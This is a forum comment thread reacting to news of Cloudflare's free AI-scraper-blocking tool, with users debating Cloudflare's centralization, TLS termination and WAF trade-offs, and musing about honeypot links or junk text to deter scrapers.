Cloudflare, the publicly traded cloud service provider, has launched a new, free tool to prevent bots from scraping websites hosted on its platform for data to train AI models.

Some AI vendors, including Google, OpenAI and Apple, allow website owners to block the bots they use for data scraping and model training by amending their site’s robots.txt, the text file that tells bots which pages they can access on a website. But, as Cloudflare points out in a post announcing its bot-combating tool, not all AI scrapers respect this.

  • schizo@forum.uncomfortable.business
    link
    fedilink
    English
    arrow-up
    33
    arrow-down
    2
    ·
    5 months ago

    I know we hate Cloudflare, but that’s a good feature addition.

    Went to turn it on on the domain covering some of my stuff, and they also directed me to their Radar site, which shows the volume of and which bots are making the most noise, and not the least bit shockingly, it’s AI bots all the way down.

    If nothing breaks I’m totally leaving this on and Amazon, Google, and OpenAI can all go screw themselves.

    • MSids@lemmy.world
      link
      fedilink
      English
      arrow-up
      10
      arrow-down
      1
      ·
      edit-2
      5 months ago

      Can you educate me on the negatives of Cloudflare?

      My company is on Akamai, who has a pretty solid combined offering of WAF, DNS, and CDN, and yet I still feel like their platform is antiquated and well overdue for a refresh.

      Thinking back to log4j, it was cloudflare who had the automatic protections in place well ahead of Akamai, who we had to ask for custom filters. Cloudflare also puts out many articles on Internet events and increase adoption of emerging best practices, sometimes through heavy shaming.

      • MigratingtoLemmy@lemmy.world
        link
        fedilink
        English
        arrow-up
        15
        ·
        5 months ago

        Cloudflare’s free CDN offering is a MiTM (you use their certificates ONLY to be able to go through their network). Adding to this, they control a lot of Internet infrastructure (comparable to Microsoft and Google). I hate all of these companies and specifically use Quad9 till I get my own DNS running. It probably doesn’t matter to the end-user but I’m happy to see a technical crowd who maintains my ideals on big tech on Lemmy

        • 𝕸𝖔𝖘𝖘@infosec.pub
          link
          fedilink
          English
          arrow-up
          6
          arrow-down
          1
          ·
          5 months ago

          It can matter to the end user. I had to spoof my user agent, because I was using a beta version of Firefox, and cloudflare thought I was a bot. Sites still don’t load sometimes at work (just keeps cycling through the “checking to make sure you’re a human” bullshit), regardless of browser. It’s a single point of failure for much of the web. Not that long ago (last year, I think), cloudflare had some bad config files pushed to prod, and about half the web broke. Cloudflare can arbitrarily block (and has done so) websites, since they’re serving the content. In theory, cf is a great service. In practice, they’ve abused it enough that we really shouldn’t trust them again.

      • schizo@forum.uncomfortable.business
        link
        fedilink
        English
        arrow-up
        13
        arrow-down
        1
        ·
        5 months ago

        I’m not opposed to them, but a lot of people on Lemmy have pretty strong opinions, primarily around the centralization around, and potential of MITMing data.

        I don’t think they’re wrong, because the centralization has given Cloudflare a shocking amount of power over who sees what and how: they, for example, will put you in captcha hell if you’re using certain browsers, connecting from certain networks, or using TOR. I don’t ever run into those issues, but they’re certainly ones that happen to people often enough that a quick search will find story after story of people that run into this mess, and that it’s sometimes annoying and painful to dig out of when and if it happens.

        And, due to how their service works and the way the certificates are handled, they are essentially MiTMing your traffic. The certificate chain between your client and cloudflare and cloudflare and your server, depending on how exactly you’ve configured it, can be done in such a way that there’s a re-encryption happening with them in the middle, and thus, Cloudflare can see all your data.

        I’ve met their CEO and VP of Safety and worked extensively with them in a previous job and don’t actually believe they’re doing anything untowards, but the fact is that they, if they so desired, absolutely could.

        I use their stuff on anything I setup for public access, either via an argo tunnel or their more traditional CDN stuff, but I can understand why other people concerned about user blocking and privacy (which are less of a venn diagram of users impacted, and more of a single circle: the privacy people are usually using browsers, addons, and VPN connections that are directly the cause of the block) wouldn’t be Cloudflare fans.

        • MSids@lemmy.world
          link
          fedilink
          English
          arrow-up
          3
          ·
          5 months ago

          The core features of a WAF do require SSL offload, which of course means that the data needs to be unencrypted with your certificate on their edge nodes, then re-encrypted with your origin certificates. There is no other way in a WAF to protect from these exploits if the encryption is not broken, and WAF vendors can respond much faster than developers can to put protections in place for emerging threats.

          I had never considered that Akamai or Cloudflare would be doing any deeper analytics on our data, as it would open them up to significant liability, same as I know for certain that AWS employees cannot see the data within our buckets.

          As for the captcha prompts, I can’t speak to how those work in Cloudflare, though I do know that the AWS WAF does leave the sensitivity of the captcha prompts entirely up to the website owner. For free versions of CF there might be fewer configurable options.

          • schizo@forum.uncomfortable.business
            link
            fedilink
            English
            arrow-up
            5
            ·
            5 months ago

            The captcha stuff is customizable, but yeah, you have to pay. The issue is that they have, in the past, shipped breaking changes in their default rules that made huge messes, and a huge portion of their customer base just uses the defaults. They’ve gotten better at this, but again, there’s nothing other than their testing to prevent it in the future.

            Also based on experiences doing infosec stuff, I can also say that there’s ABSOLUTELY a huge portion of “admins” that think more security is more betterer, and configure shit in a way that breaks so many things then get mad that they did that; there’s a LOT of depth you have to understand to configure something like Cloudflare’s WAF properly, and way too many admin types just don’t fully understand the impact of any particular thing is and get way way way waaaay too restrictive and then get mad that it breaks things.

            The SSL offload requires you to trust your vendor, and agree that the odds that they’re doing anything suspicious is likely zero: their business would damn near instantly implode if they got caught. But, again, you’re trusting policy and procedure to keep people out of data.

            I think there’s a LOT of bias against “MITM” meaning “malicious”, and Lemmy ranging from very left to leftish, a huge bias against big tech (which, imo, is 100% warranted and totally earned by decades of shitty behavior) which shows up as a ‘Cloudflare is bad because the MITM your traffic’ lacking the nuance that, well, every WAF and a heck of a lot of caching CDNs do that because that’s how it works.

  • FaceDeer@fedia.io
    link
    fedilink
    arrow-up
    19
    arrow-down
    5
    ·
    5 months ago

    Now taking bets on how long it will be before Cloudflare announces that they’re selling AI training datasets based off of the content they’re managing…

    • lemmyvore@feddit.nl
      link
      fedilink
      English
      arrow-up
      6
      ·
      4 months ago

      Would be rather short-sided of them. They rely on the free tier of their services for upscaling and word of mouth. People are already wary of the fact CF can snoop on what’s supposed to be private connections, but so far they’ve used that only for good.

  • Malcolm@lemmy.world
    link
    fedilink
    English
    arrow-up
    7
    ·
    5 months ago

    I’m not much of a programmer and I don’t host any public sites, but how feasible would it be to build an equivalent of Night Shade but for LLMs that site operators could run?

    I’m thinking strategies akin to embedding loads of unrendered links to pages full of junk text. Possibly have the junk text generated by LLMs and worsened via creative scripting.

    It would certainly cost more bandwidth but might also reveal more bad actors. Are modern scrapers sophisticated enough to not be fooled into pulling in that sort of junk data? Are there any existing projects doing this sort of thing?

    • Wirlocke@lemmy.blahaj.zone
      link
      fedilink
      English
      arrow-up
      3
      ·
      4 months ago

      To get more direct to the point you could use those unrendered dummy links to ban whatever IPs click them.

      With the vast amounts of training data and how curated they’re becoming (Llama and Claude are going that direction) it’s infeasible to actually poison a large model to this degree.

    • GBU_28@lemm.ee
      link
      fedilink
      English
      arrow-up
      3
      arrow-down
      1
      ·
      4 months ago

      Sure, but it adds cost. An OCR scrape then a matching with the html parse.

      Regarding ideas of IP banning, proxies are already heavily leveraged.

      This is an ugly fight